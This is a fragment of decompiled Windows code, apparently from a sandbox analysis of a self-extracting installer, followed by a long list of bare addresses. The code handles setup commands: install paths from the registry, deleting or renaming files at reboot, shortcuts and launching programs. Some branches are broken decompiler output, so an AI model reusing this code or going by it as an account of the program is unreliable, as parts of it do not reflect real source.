							while(E01221708(_t281 - 0xfc8c,  *((intOrPtr*)(0x124d618 + _t277 * 4))) != 0) {
								_t277 = _t277 + 1;
								if(_t277 < 0xe) {
									continue;
								} else {
									goto L162;
								}
							}
							__eflags = _t277 - 0xd;
							if(__eflags > 0) {
								continue;
							}
							L8:
							switch( *((intOrPtr*)(_t277 * 4 +  &M0122C929))) {
								case 0:
									L9:
									__eflags = _t259 - 2;
									if(_t259 == 2) {
										E01229D58(_t281 - 0x7c84, 0x800);
										E0121A3DD(E0121B8A5(_t281 - 0x7c84, _t281 - 0x5c84, _t281 - 0xdc8c, 0x800), _t259, _t281 - 0x8c8c, _t277);
										 *(_t281 - 4) = 0;
										E0121A517(_t281 - 0x8c8c, _t281 - 0xdc8c);
										E01217098(_t281 - 0x3c84);
										while(1) {
											L23:
											_push(0);
											_t267 = _t281 - 0x8c8c;
											_t222 = E0121A46A(_t281 - 0x8c8c, _t272, _t281 - 0x3c84);
											__eflags = _t222;
											if(_t222 == 0) {
												break;
											}
											L11:
											SetFileAttributesW(_t281 - 0x3c84, 0);
											__eflags =  *(_t281 - 0x2c78);
											if(__eflags == 0) {
												L16:
												_t226 = GetFileAttributesW(_t281 - 0x3c84);
												__eflags = _t226 - 0xffffffff;
												if(_t226 == 0xffffffff) {
													continue;
												}
												L17:
												_t228 = DeleteFileW(_t281 - 0x3c84);
												__eflags = _t228;
												if(_t228 != 0) {
													continue;
												} else {
													_t279 = 0;
													_push(0);
													goto L20;
													L20:
													E01213FD6(_t281 - 0x103c, 0x800, L"%s.%d.tmp", _t281 - 0x3c84);
													_t283 = _t283 + 0x14;
													_t233 = GetFileAttributesW(_t281 - 0x103c);
													__eflags = _t233 - 0xffffffff;
													if(_t233 != 0xffffffff) {
														_t279 = _t279 + 1;
														__eflags = _t279;
														_push(_t279);
														goto L20;
													} else {
														_t236 = MoveFileW(_t281 - 0x3c84, _t281 - 0x103c);
														__eflags = _t236;
														if(_t236 != 0) {
															MoveFileExW(_t281 - 0x103c, 0, 4);
														}
														continue;
													}
												}
											}
											L12:
											E0121B437(_t267, __eflags, _t281 - 0x7c84, _t281 - 0x103c, 0x800);
											E0121B147(__eflags, _t281 - 0x103c, 0x800);
											_t280 = E012333F3(_t281 - 0x7c84);
											__eflags = _t280 - 4;
											if(_t280 < 4) {
												L14:
												_t247 = E0121B865(_t281 - 0x5c84);
												__eflags = _t247;
												if(_t247 != 0) {
													break;
												}
												L15:
												_t250 = E012333F3(_t281 - 0x3c84);
												__eflags = 0;
												 *((short*)(_t281 + _t250 * 2 - 0x3c82)) = 0;
												E0122F1A0(0x800, _t281 - 0x3c, 0, 0x1e);
												_t283 = _t283 + 0x10;
												 *((intOrPtr*)(_t281 - 0x38)) = 3;
												_push(0x14);
												_pop(_t253);
												 *((short*)(_t281 - 0x2c)) = _t253;
												 *((intOrPtr*)(_t281 - 0x34)) = _t281 - 0x3c84;
												_push(_t281 - 0x3c);
												 *0x1271074();
												goto L16;
											}
											L13:
											_t258 = E012333F3(_t281 - 0x103c);
											__eflags = _t280 - _t258;
											if(_t280 > _t258) {
												goto L15;
											}
											goto L14;
										}
										L24:
										 *(_t281 - 4) =  *(_t281 - 4) | 0xffffffff;
										E0121A3F3(_t281 - 0x8c8c);
									}
									goto L162;
								case 1:
									L25:
									__eflags = __ebx;
									if(__ebx == 0) {
										__eax = E012333F3(__esi);
										__eax = __eax + __edi;
										_push(__eax);
										_push( *0x126cc7c);
										__eax = E0123341E(__ecx, __edx);
										__esp = __esp + 0xc;
										__eflags = __eax;
										if(__eax != 0) {
											 *0x126cc7c = __eax;
											__eflags = __bl;
											if(__bl != 0) {
												__ecx = 0;
												__eflags = 0;
												 *__eax = __cx;
											}
											__eax = E01236FAD(__eax, __esi);
											_pop(__ecx);
											_pop(__ecx);
										}
										__eflags = __bh;
										if(__bh == 0) {
											__eax = L0123340E(__esi);
										}
									}
									goto L162;
								case 2:
									L39:
									__eflags = __ebx;
									if(__ebx == 0) {
										__ebp - 0x5c84 = SetWindowTextW( *(__ebp + 8), __ebp - 0x5c84);
									}
									goto L162;
								case 3:
									L41:
									__eflags = __ebx;
									if(__ebx != 0) {
										goto L162;
									}
									L42:
									__eflags =  *0x1259472 - __di;
									if( *0x1259472 != __di) {
										goto L162;
									}
									L43:
									__eax = 0;
									__edi = __ebp - 0x5c84;
									_push(0x22);
									 *(__ebp - 0x103c) = __ax;
									_pop(__eax);
									__eflags =  *(__ebp - 0x5c84) - __ax;
									if( *(__ebp - 0x5c84) == __ax) {
										__edi = __ebp - 0x5c82;
									}
									__eax = E012333F3(__edi);
									__esi = 0x800;
									__eflags = __eax - 0x800;
									if(__eax >= 0x800) {
										goto L162;
									} else {
										L46:
										__eax =  *__edi & 0x0000ffff;
										_push(0x5c);
										_pop(__ecx);
										__eflags = ( *__edi & 0x0000ffff) - 0x2e;
										if(( *__edi & 0x0000ffff) != 0x2e) {
											L50:
											__eflags = __ax - __cx;
											if(__ax == __cx) {
												L62:
												__ebp - 0x103c = E0121FD96(__ebp - 0x103c, __edi, __esi);
												__ebx = 0;
												__eflags = 0;
												L63:
												_push(0x22);
												_pop(__eax);
												__eax = __ebp - 0x103c;
												__eax = E0123161B(__ebp - 0x103c, __ebp - 0x103c);
												_pop(__ecx);
												_pop(__ecx);
												__eflags = __eax;
												if(__eax != 0) {
													__eflags =  *((intOrPtr*)(__eax + 2)) - __bx;
													if( *((intOrPtr*)(__eax + 2)) == __bx) {
														__ecx = 0;
														__eflags = 0;
														 *__eax = __cx;
													}
												}
												__eax = __ebp - 0x103c;
												__edi = 0x1259472;
												E0121FD96(0x1259472, __ebp - 0x103c, __esi) = __ebp - 0x103c;
												__eax = E0122A81F(__ebp - 0x103c, __esi);
												__esi = GetDlgItem( *(__ebp + 8), 0x66);
												__ebp - 0x103c = SetWindowTextW(__esi, __ebp - 0x103c); // executed
												__eax = SendMessageW(__esi, 0x143, __ebx, 0x1259472); // executed
												__eax = __ebp - 0x103c;
												__eax = E01233429(__ebp - 0x103c, 0x1259472, __eax);
												_pop(__ecx);
												_pop(__ecx);
												__eflags = __eax;
												if(__eax != 0) {
													__ebp - 0x103c = SendMessageW(__esi, 0x143, __ebx, __ebp - 0x103c);
												}
												goto L162;
											}
											L51:
											__eflags = __ax;
											if(__ax == 0) {
												L53:
												__eax = __ebp - 0x18;
												__ebx = 0;
												__eax = RegOpenKeyExW(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion", 0, 1, __ebp - 0x18); // executed
												__eflags = __eax;
												if(__eax == 0) {
													__eax = __ebp - 0x14;
													 *(__ebp - 0x14) = 0x1000;
													__ebp - 0x103c = __ebp - 0x1c;
													__eax = RegQueryValueExW( *(__ebp - 0x18), L"ProgramFilesDir", 0, __ebp - 0x1c, __ebp - 0x103c, __ebp - 0x14); // executed
													__eax = RegCloseKey( *(__ebp - 0x18)); // executed
													__eax =  *(__ebp - 0x14);
													__ecx = 0x7ff;
													__eax =  *(__ebp - 0x14) >> 1;
													__eflags = __eax - 0x7ff;
													if(__eax >= 0x7ff) {
														__eax = 0x7ff;
													}
													__ecx = 0;
													__eflags = 0;
													 *((short*)(__ebp + __eax * 2 - 0x103c)) = __cx;
												}
												__eflags =  *(__ebp - 0x103c) - __bx;
												if( *(__ebp - 0x103c) != __bx) {
													__eax = __ebp - 0x103c;
													__eax = E012333F3(__ebp - 0x103c);
													_push(0x5c);
													_pop(__ecx);
													__eflags =  *((intOrPtr*)(__ebp + __eax * 2 - 0x103e)) - __cx;
													if(__eflags != 0) {
														__ebp - 0x103c = E0121FD6E(__eflags, __ebp - 0x103c, "\\", __esi);
													}
												}
												__esi = E012333F3(__edi);
												__eax = __ebp - 0x103c;
												__eflags = __esi - 0x7ff;
												__esi = 0x800;
												if(__eflags < 0) {
													__ebp - 0x103c = E0121FD6E(__eflags, __ebp - 0x103c, __edi, 0x800);
												}
												goto L63;
											}
											L52:
											__eflags =  *((short*)(__edi + 2)) - 0x3a;
											if( *((short*)(__edi + 2)) == 0x3a) {
												goto L62;
											}
											goto L53;
										}
										L47:
										__eflags =  *((intOrPtr*)(__edi + 2)) - __cx;
										if( *((intOrPtr*)(__edi + 2)) != __cx) {
											goto L50;
										}
										L48:
										__edi = __edi + 4;
										__ebx = 0;
										__eflags =  *__edi - __bx;
										if( *__edi == __bx) {
											goto L162;
										} else {
											__ebp - 0x103c = E0121FD96(__ebp - 0x103c, __edi, 0x800);
											goto L63;
										}
									}
								case 4:
									L68:
									__eflags =  *0x125946c - 1;
									__eflags = __eax - 0x125946c;
									 *__edi =  *__edi + __ecx;
									__eflags =  *(__ebx + 6) & __bl;
									 *__eax =  *__eax + __al;
									__eflags =  *__eax;
								case 5:
									L73:
									__eax =  *(__ebp - 0x5c84) & 0x0000ffff;
									__ecx = 0;
									__eax =  *(__ebp - 0x5c84) & 0x0000ffff;
									__eflags = __eax;
									if(__eax == 0) {
										L80:
										 *0x1257442 = __cl;
										 *0x1257443 = 1;
										goto L162;
									}
									L74:
									__eax = __eax - 0x30;
									__eflags = __eax;
									if(__eax == 0) {
										L78:
										 *0x1257442 = __cl;
										L79:
										 *0x1257443 = __cl;
										goto L162;
									}
									L75:
									__eax = __eax - 1;
									__eflags = __eax;
									if(__eax == 0) {
										goto L80;
									}
									L76:
									__eax = __eax - 1;
									__eflags = __eax;
									if(__eax != 0) {
										goto L162;
									}
									L77:
									 *0x1257442 = 1;
									goto L79;
								case 6:
									L86:
									__eflags = __ebx - 4;
									if(__ebx != 4) {
										goto L90;
									}
									L87:
									__eax = __ebp - 0x5c84;
									__eax = E01233429(__ebp - 0x5c84, __eax, L"<>");
									_pop(__ecx);
									_pop(__ecx);
									__eflags = __eax;
									if(__eax == 0) {
										goto L90;
									}
									L88:
									_push(__edi);
									goto L89;
								case 7:
									goto L0;
								case 8:
									L114:
									__eflags = __ebx - 3;
									if(__ebx == 3) {
										__eflags =  *(__ebp - 0x5c84) - __di;
										if(__eflags != 0) {
											__eax = __ebp - 0x5c84;
											_push(__ebp - 0x5c84);
											__eax = E01236F4C(__ebx, __edi);
											_pop(__ecx);
											 *0x126dc8c = __eax;
										}
										__eax = __ebp + 0xc;
										_push(__ebp + 0xc);
										 *0x126dc88 = E0122AAEA(__ecx, __edx, __eflags);
									}
									 *0x1265b73 = 1;
									goto L162;
								case 9:
									L119:
									__eflags = __ebx - 5;
									if(__ebx != 5) {
										L90:
										 *0x126dc90 = 1;
										goto L162;
									}
									L120:
									_push(1);
									L89:
									__eax = __ebp - 0x5c84;
									_push(__ebp - 0x5c84);
									_push( *(__ebp + 8));
									__eax = E0122CC9F(__ebp);
									goto L90;
								case 0xa:
									L121:
									__eflags = __ebx - 6;
									if(__ebx != 6) {
										goto L162;
									}
									L122:
									__eax = 0;
									 *(__ebp - 0x2c3c) = __ax;
									__eax =  *(__ebp - 0x1bc8c) & 0x0000ffff;
									__eax = E01236280( *(__ebp - 0x1bc8c) & 0x0000ffff);
									_push(0x800);
									__eflags = __eax - 0x50;
									if(__eax == 0x50) {
										_push(0x126ab7a);
										__eax = __ebp - 0x2c3c;
										_push(__ebp - 0x2c3c);
										__eax = E0121FD96();
										 *(__ebp - 0x14) = 2;
									} else {
										__eflags = __eax - 0x54;
										__eax = __ebp - 0x2c3c;
										if(__eflags == 0) {
											_push(0x1269b7a);
											_push(__eax);
											__eax = E0121FD96();
											 *(__ebp - 0x14) = 7;
										} else {
											_push(0x126bb7a);
											_push(__eax);
											__eax = E0121FD96();
											 *(__ebp - 0x14) = 0x10;
										}
									}
									__eax = 0;
									 *(__ebp - 0x9c8c) = __ax;
									 *(__ebp - 0x1c3c) = __ax;
									__ebp - 0x19c8c = __ebp - 0x6c84;
									__eax = E01235646(__ebp - 0x6c84, __ebp - 0x19c8c);
									_pop(__ecx);
									_pop(__ecx);
									_push(0x22);
									_pop(__ebx);
									__eflags =  *(__ebp - 0x6c84) - __bx;
									if( *(__ebp - 0x6c84) != __bx) {
										L130:
										__ebp - 0x6c84 = E0121A0C0(__ebp - 0x6c84);
										__eflags = __al;
										if(__al != 0) {
											goto L147;
										}
										L131:
										__ebx = __edi;
										__esi = __ebp - 0x6c84;
										__eflags =  *(__ebp - 0x6c84) - __bx;
										if( *(__ebp - 0x6c84) == __bx) {
											goto L147;
										}
										L132:
										_push(0x20);
										_pop(__ecx);
										do {
											L133:
											__eax = __esi->i & 0x0000ffff;
											__eflags = __ax - __cx;
											if(__ax == __cx) {
												L135:
												__edi = __eax;
												__eax = 0;
												__esi->i = __ax;
												__ebp - 0x6c84 = E0121A0C0(__ebp - 0x6c84);
												__eflags = __al;
												if(__al == 0) {
													L142:
													__esi->i = __di;
													L143:
													_push(0x20);
													_pop(__ecx);
													__edi = 0;
													__eflags = 0;
													goto L144;
												}
												L136:
												_push(0x2f);
												_pop(__eax);
												__ebx = __esi;
												__eflags = __di - __ax;
												if(__di != __ax) {
													L138:
													_push(0x20);
													_pop(__eax);
													do {
														L139:
														__esi =  &(__esi->i);
														__eflags = __esi->i - __ax;
													} while (__esi->i == __ax);
													_push(__esi);
													__eax = __ebp - 0x1c3c;
													L141:
													_push(__eax);
													__eax = E01235646();
													_pop(__ecx);
													_pop(__ecx);
													 *__ebx = __di;
													goto L143;
												}
												L137:
												 *(__ebp - 0x1c3c) = __ax;
												__eax =  &(__esi->i);
												_push( &(__esi->i));
												__eax = __ebp - 0x1c3a;
												goto L141;
											}
											L134:
											_push(0x2f);
											_pop(__edx);
											__eflags = __ax - __dx;
											if(__ax != __dx) {
												goto L144;
											}
											goto L135;
											L144:
											__esi =  &(__esi->i);
											__eflags = __esi->i - __di;
										} while (__esi->i != __di);
										__eflags = __ebx;
										if(__ebx != 0) {
											__eax = 0;
											__eflags = 0;
											 *__ebx = __ax;
										}
										goto L147;
									} else {
										L128:
										__ebp - 0x19c8a = __ebp - 0x6c84;
										E01235646(__ebp - 0x6c84, __ebp - 0x19c8a) = __ebp - 0x6c82;
										_push(__ebx);
										_push(__ebp - 0x6c82);
										__eax = E01231438(__ecx);
										__esp = __esp + 0x10;
										__eflags = __eax;
										if(__eax != 0) {
											__ecx = 0;
											 *__eax = __cx;
											__ebp - 0x1c3c = E01235646(__ebp - 0x1c3c, __ebp - 0x1c3c);
											_pop(__ecx);
											_pop(__ecx);
										}
										L147:
										__eflags =  *((short*)(__ebp - 0x11c8c));
										__ebx = 0x800;
										if( *((short*)(__ebp - 0x11c8c)) != 0) {
											__ebp - 0x9c8c = __ebp - 0x11c8c;
											__eax = E0121B179(__ebp - 0x11c8c, __ebp - 0x9c8c, 0x800);
										}
										__ebp - 0xbc8c = __ebp - 0x6c84;
										__eax = E0121B179(__ebp - 0x6c84, __ebp - 0xbc8c, __ebx);
										__eflags =  *(__ebp - 0x2c3c);
										if(__eflags == 0) {
											__ebp - 0x2c3c = E0122AA7E(__ecx, __ebp - 0x2c3c,  *(__ebp - 0x14));
										}
										__ebp - 0x2c3c = E0121B147(__eflags, __ebp - 0x2c3c, __ebx);
										__eflags =  *((short*)(__ebp - 0x17c8c));
										if(__eflags != 0) {
											__ebp - 0x17c8c = __ebp - 0x2c3c;
											E0121FD6E(__eflags, __ebp - 0x2c3c, __ebp - 0x17c8c, __ebx) = __ebp - 0x2c3c;
											__eax = E0121B147(__eflags, __ebp - 0x2c3c, __ebx);
										}
										__ebp - 0x2c3c = __ebp - 0xcc8c;
										__eax = E01235646(__ebp - 0xcc8c, __ebp - 0x2c3c);
										__eflags =  *(__ebp - 0x13c8c);
										__eax = __ebp - 0x13c8c;
										_pop(__ecx);
										_pop(__ecx);
										if(__eflags == 0) {
											__eax = __ebp - 0x19c8c;
										}
										__ebp - 0x2c3c = E0121FD6E(__eflags, __ebp - 0x2c3c, __ebp - 0x2c3c, __ebx);
										__eax = __ebp - 0x2c3c;
										__eflags = E0121B3D3(__ebp - 0x2c3c);
										if(__eflags == 0) {
											L157:
											__ebp - 0x2c3c = E0121FD6E(__eflags, __ebp - 0x2c3c, L".lnk", __ebx);
											goto L158;
										} else {
											L156:
											__eflags = __eax;
											if(__eflags == 0) {
												L158:
												_push(1);
												__eax = __ebp - 0x2c3c;
												_push(__ebp - 0x2c3c);
												E01219F8F(__ecx, __ebp) = __ebp - 0xbc8c;
												__ebp - 0xac8c = E01235646(__ebp - 0xac8c, __ebp - 0xbc8c);
												_pop(__ecx);
												_pop(__ecx);
												__ebp - 0xac8c = E0121BC0F(__eflags, __ebp - 0xac8c);
												__ecx =  *(__ebp - 0x1c3c) & 0x0000ffff;
												__eax = __ebp - 0x1c3c;
												__ecx =  ~( *(__ebp - 0x1c3c) & 0x0000ffff);
												__edx = __ebp - 0x9c8c;
												__esi = __ebp - 0xac8c;
												asm("sbb ecx, ecx");
												__ecx =  ~( *(__ebp - 0x1c3c) & 0x0000ffff) & __ebp - 0x00001c3c;
												 *(__ebp - 0x9c8c) & 0x0000ffff =  ~( *(__ebp - 0x9c8c) & 0x0000ffff);
												asm("sbb eax, eax");
												__eax =  ~( *(__ebp - 0x9c8c) & 0x0000ffff) & __ebp - 0x00009c8c;
												 *(__ebp - 0xac8c) & 0x0000ffff =  ~( *(__ebp - 0xac8c) & 0x0000ffff);
												__eax = __ebp - 0x15c8c;
												asm("sbb edx, edx");
												__edx =  ~( *(__ebp - 0xac8c) & 0x0000ffff) & __esi;
												E0122A564(__ebp - 0x15c8c) = __ebp - 0x2c3c;
												__ebp - 0xbc8c = E01229B4C(__ecx, __edi, __ebp - 0xbc8c, __ebp - 0x2c3c,  ~( *(__ebp - 0xac8c) & 0x0000ffff) & __esi, __ebp - 0xbc8c,  ~( *(__ebp - 0x9c8c) & 0x0000ffff) & __ebp - 0x00009c8c,  ~( *(__ebp - 0x1c3c) & 0x0000ffff) & __ebp - 0x00001c3c);
												__eflags =  *(__ebp - 0xcc8c);
												if( *(__ebp - 0xcc8c) != 0) {
													_push(__edi);
													__eax = __ebp - 0xcc8c;
													_push(__ebp - 0xcc8c);
													_push(5);
													_push(0x1000);
													__eax =  *0x1271078();
												}
												goto L162;
											}
											goto L157;
										}
									}
								case 0xb:
									L160:
									__eflags = __ebx - 7;
									if(__ebx == 7) {
										 *0x1259470 = 1;
									}
									goto L162;
								case 0xc:
									L81:
									__eax =  *(__ebp - 0x5c84) & 0x0000ffff;
									__eax = E01236280( *(__ebp - 0x5c84) & 0x0000ffff);
									__eflags = __eax - 0x46;
									if(__eax == 0x46) {
										 *0x1257444 = 1;
									} else {
										__eflags = __eax - 0x55;
										if(__eax == 0x55) {
											 *0x1257445 = 1;
										} else {
											__eax = 0;
											 *0x1257444 = __al;
											 *0x1257445 = __al;
										}
									}
									goto L162;
								case 0xd:
									L91:
									 *0x126dc91 = 1;
									__eax = __eax + 0x126dc91;
									_t102 = __esi + 0x39;
									 *_t102 =  *(__esi + 0x39) + __esp;
									__eflags =  *_t102;
									__ebp = 0xffffa37c;
									if( *_t102 != 0) {
										_t104 = __ebp - 0x5c84; // 0xffff46f8
										__eax = _t104;
										_push(_t104);
										 *0x124d5fc = E012216F4();
									}
									goto L162;
							}
							L2:
							_t208 = E0122A647(_t208, _t276);
							_t276 = _t276 + 0x2000;
							_t273 = _t273 - 1;
							if(_t273 != 0) {
								goto L2;
							} else {
								_t277 = _t273;
								goto L4;
							}
						}
						L163:
						 *[fs:0x0] =  *((intOrPtr*)(_t281 - 0xc));
						return _t207;
					}
					L98:
					__eflags =  *0x1265b72;
					if( *0x1265b72 != 0) {
						goto L162;
					}
					L99:
					__eax = 0;
					 *(__ebp - 0x143c) = __ax;
					__eax = __ebp - 0x5c84;
					_push(__ebp - 0x5c84);
					__eax = E01231438(__ecx);
					_pop(__ecx);
					__ecx = 0x2c;
					__eflags = __eax;
					if(__eax != 0) {
						L106:
						__eflags =  *(__ebp - 0x143c);
						if( *(__ebp - 0x143c) == 0) {
							__ebp - 0x1bc8c = __ebp - 0x5c84;
							E0121FD96(__ebp - 0x5c84, __ebp - 0x1bc8c, 0x1000) = __ebp - 0x19c8c;
							__ebp - 0x143c = E0121FD96(__ebp - 0x143c, __ebp - 0x19c8c, 0x200);
						}
						__ebp - 0x5c84 = E0122A472(__ebp - 0x5c84);
						__eax = 0;
						 *(__ebp - 0x4c84) = __ax;
						__ebp - 0x143c = __ebp - 0x5c84;
						__eax = E01229EB3( *(__ebp + 8), __ebp - 0x5c84, __ebp - 0x143c, 0x24);
						__eflags = __eax - 6;
						if(__eax == 6) {
							goto L162;
						} else {
							L109:
							__eax = 0;
							__eflags = 0;
							 *0x1257447 = 1;
							 *0x125846a = __ax;
							__eax = EndDialog( *(__ebp + 8), 1);
							goto L110;
						}
					}
					L100:
					__esi = 0;
					__eflags =  *(__ebp - 0x5c84) - __dx;
					if( *(__ebp - 0x5c84) == __dx) {
						goto L106;
					}
					L101:
					__ecx = 0;
					__eax = __ebp - 0x5c84;
					while(1) {
						L102:
						__eflags =  *__eax - 0x40;
						if( *__eax == 0x40) {
							break;
						}
						L103:
						__esi =  &(__esi->i);
						__eax = __ebp - 0x5c84;
						__ecx = __esi + __esi;
						__eax = __ebp - 0x5c84 + __ecx;
						__eflags =  *__eax - __dx;
						if( *__eax != __dx) {
							continue;
						}
						L104:
						goto L106;
					}
					L105:
					__ebp - 0x5c82 = __ebp - 0x5c82 + __ecx;
					__ebp - 0x143c = E0121FD96(__ebp - 0x143c, __ebp - 0x5c82 + __ecx, 0x200);
					__eax = 0;
					__eflags = 0;
					 *(__ebp + __esi * 2 - 0x5c84) = __ax;
					goto L106;
					L110:
					__eflags = _t259 - 7;
					if(_t259 == 7) {
						__eflags =  *0x125946c;
						if( *0x125946c == 0) {
							 *0x125946c = 2;
						}
						 *0x1258468 = 1;
					}
					goto L162;
				}
			}










                                                                                                                                                    0x0122c3ab
                                                                                                                                                    0x0122c3ab
                                                                                                                                                    0x0122c3ab
                                                                                                                                                    0x0122c3ab
                                                                                                                                                    0x0122c3ae
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122c3b4
                                                                                                                                                    0x0122c3b4
                                                                                                                                                    0x0122c3ba
                                                                                                                                                    0x0122c3c8
                                                                                                                                                    0x0122c3d4
                                                                                                                                                    0x0122c3d6
                                                                                                                                                    0x0122c3d8
                                                                                                                                                    0x0122c3dd
                                                                                                                                                    0x0122c3dd
                                                                                                                                                    0x0122c3dd
                                                                                                                                                    0x0122c3f5
                                                                                                                                                    0x0122c402
                                                                                                                                                    0x0122c407
                                                                                                                                                    0x0122c409
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122c3db
                                                                                                                                                    0x0122c3db
                                                                                                                                                    0x0122c3db
                                                                                                                                                    0x0122c3dc
                                                                                                                                                    0x0122c3dc
                                                                                                                                                    0x0122c40b
                                                                                                                                                    0x0122c415
                                                                                                                                                    0x0122c41b
                                                                                                                                                    0x0122c423
                                                                                                                                                    0x0122c8e3
                                                                                                                                                    0x0122c8e3
                                                                                                                                                    0x0122c8e3
                                                                                                                                                    0x0122c8e8
                                                                                                                                                    0x0122c8ec
                                                                                                                                                    0x0122c8f0
                                                                                                                                                    0x0122c8f7
                                                                                                                                                    0x0122c8fe
                                                                                                                                                    0x0122c901
                                                                                                                                                    0x0122c906
                                                                                                                                                    0x0122c909
                                                                                                                                                    0x0122c90e
                                                                                                                                                    0x0122bd8b
                                                                                                                                                    0x0122bd91
                                                                                                                                                    0x0122bd97
                                                                                                                                                    0x0122bd97
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122bdac
                                                                                                                                                    0x0122bdc3
                                                                                                                                                    0x0122bdc7
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122bdc9
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122bdc9
                                                                                                                                                    0x0122bdc7
                                                                                                                                                    0x0122bdce
                                                                                                                                                    0x0122bdd1
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122bdd7
                                                                                                                                                    0x0122bdd7
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122bdde
                                                                                                                                                    0x0122bdde
                                                                                                                                                    0x0122bde1
                                                                                                                                                    0x0122bdf4
                                                                                                                                                    0x0122be1a
                                                                                                                                                    0x0122be2e
                                                                                                                                                    0x0122be31
                                                                                                                                                    0x0122be3c
                                                                                                                                                    0x0122bf80
                                                                                                                                                    0x0122bf80
                                                                                                                                                    0x0122bf80
                                                                                                                                                    0x0122bf88
                                                                                                                                                    0x0122bf8e
                                                                                                                                                    0x0122bf93
                                                                                                                                                    0x0122bf95
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122be46
                                                                                                                                                    0x0122be4e
                                                                                                                                                    0x0122be54
                                                                                                                                                    0x0122be5a
                                                                                                                                                    0x0122bf00
                                                                                                                                                    0x0122bf07
                                                                                                                                                    0x0122bf0d
                                                                                                                                                    0x0122bf10
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122bf12
                                                                                                                                                    0x0122bf19
                                                                                                                                                    0x0122bf1f
                                                                                                                                                    0x0122bf21
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122bf23
                                                                                                                                                    0x0122bf23
                                                                                                                                                    0x0122bf25
                                                                                                                                                    0x0122bf26
                                                                                                                                                    0x0122bf2a
                                                                                                                                                    0x0122bf3e
                                                                                                                                                    0x0122bf43
                                                                                                                                                    0x0122bf4d
                                                                                                                                                    0x0122bf53
                                                                                                                                                    0x0122bf56
                                                                                                                                                    0x0122bf28
                                                                                                                                                    0x0122bf28
                                                                                                                                                    0x0122bf29
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122bf58
                                                                                                                                                    0x0122bf66
                                                                                                                                                    0x0122bf6c
                                                                                                                                                    0x0122bf6e
                                                                                                                                                    0x0122bf7a
                                                                                                                                                    0x0122bf7a
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122bf6e
                                                                                                                                                    0x0122bf56
                                                                                                                                                    0x0122bf21
                                                                                                                                                    0x0122be60
                                                                                                                                                    0x0122be6f
                                                                                                                                                    0x0122be7c
                                                                                                                                                    0x0122be8d
                                                                                                                                                    0x0122be90
                                                                                                                                                    0x0122be93
                                                                                                                                                    0x0122bea6
                                                                                                                                                    0x0122bead
                                                                                                                                                    0x0122beb2
                                                                                                                                                    0x0122beb4
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122beba
                                                                                                                                                    0x0122bec1
                                                                                                                                                    0x0122bec6
                                                                                                                                                    0x0122becb
                                                                                                                                                    0x0122bed7
                                                                                                                                                    0x0122bedc
                                                                                                                                                    0x0122bedf
                                                                                                                                                    0x0122bee6
                                                                                                                                                    0x0122bee8
                                                                                                                                                    0x0122bee9
                                                                                                                                                    0x0122bef3
                                                                                                                                                    0x0122bef9
                                                                                                                                                    0x0122befa
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122befa
                                                                                                                                                    0x0122be95
                                                                                                                                                    0x0122be9c
                                                                                                                                                    0x0122bea2
                                                                                                                                                    0x0122bea4
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122bea4
                                                                                                                                                    0x0122bf9b
                                                                                                                                                    0x0122bf9b
                                                                                                                                                    0x0122bfa5
                                                                                                                                                    0x0122bfa5
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122bfaf
                                                                                                                                                    0x0122bfaf
                                                                                                                                                    0x0122bfb1
                                                                                                                                                    0x0122c004
                                                                                                                                                    0x0122c009
                                                                                                                                                    0x0122c012
                                                                                                                                                    0x0122c013
                                                                                                                                                    0x0122c019
                                                                                                                                                    0x0122c01e
                                                                                                                                                    0x0122c021
                                                                                                                                                    0x0122c023
                                                                                                                                                    0x0122c025
                                                                                                                                                    0x0122c02a
                                                                                                                                                    0x0122c02c
                                                                                                                                                    0x0122c02e
                                                                                                                                                    0x0122c02e
                                                                                                                                                    0x0122c030
                                                                                                                                                    0x0122c030
                                                                                                                                                    0x0122c035
                                                                                                                                                    0x0122c03a
                                                                                                                                                    0x0122c03b
                                                                                                                                                    0x0122c03b
                                                                                                                                                    0x0122c03c
                                                                                                                                                    0x0122c03e
                                                                                                                                                    0x0122c045
                                                                                                                                                    0x0122c04a
                                                                                                                                                    0x0122c03e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122c050
                                                                                                                                                    0x0122c050
                                                                                                                                                    0x0122c052
                                                                                                                                                    0x0122c062
                                                                                                                                                    0x0122c062
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122c06d
                                                                                                                                                    0x0122c06d
                                                                                                                                                    0x0122c06f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122c075
                                                                                                                                                    0x0122c075
                                                                                                                                                    0x0122c07c
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122c082
                                                                                                                                                    0x0122c082
                                                                                                                                                    0x0122c084
                                                                                                                                                    0x0122c08a
                                                                                                                                                    0x0122c08c
                                                                                                                                                    0x0122c093
                                                                                                                                                    0x0122c094
                                                                                                                                                    0x0122c09b
                                                                                                                                                    0x0122c09d
                                                                                                                                                    0x0122c09d
                                                                                                                                                    0x0122c0a4
                                                                                                                                                    0x0122c0a9
                                                                                                                                                    0x0122c0af
                                                                                                                                                    0x0122c0b1
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122c0b7
                                                                                                                                                    0x0122c0b7
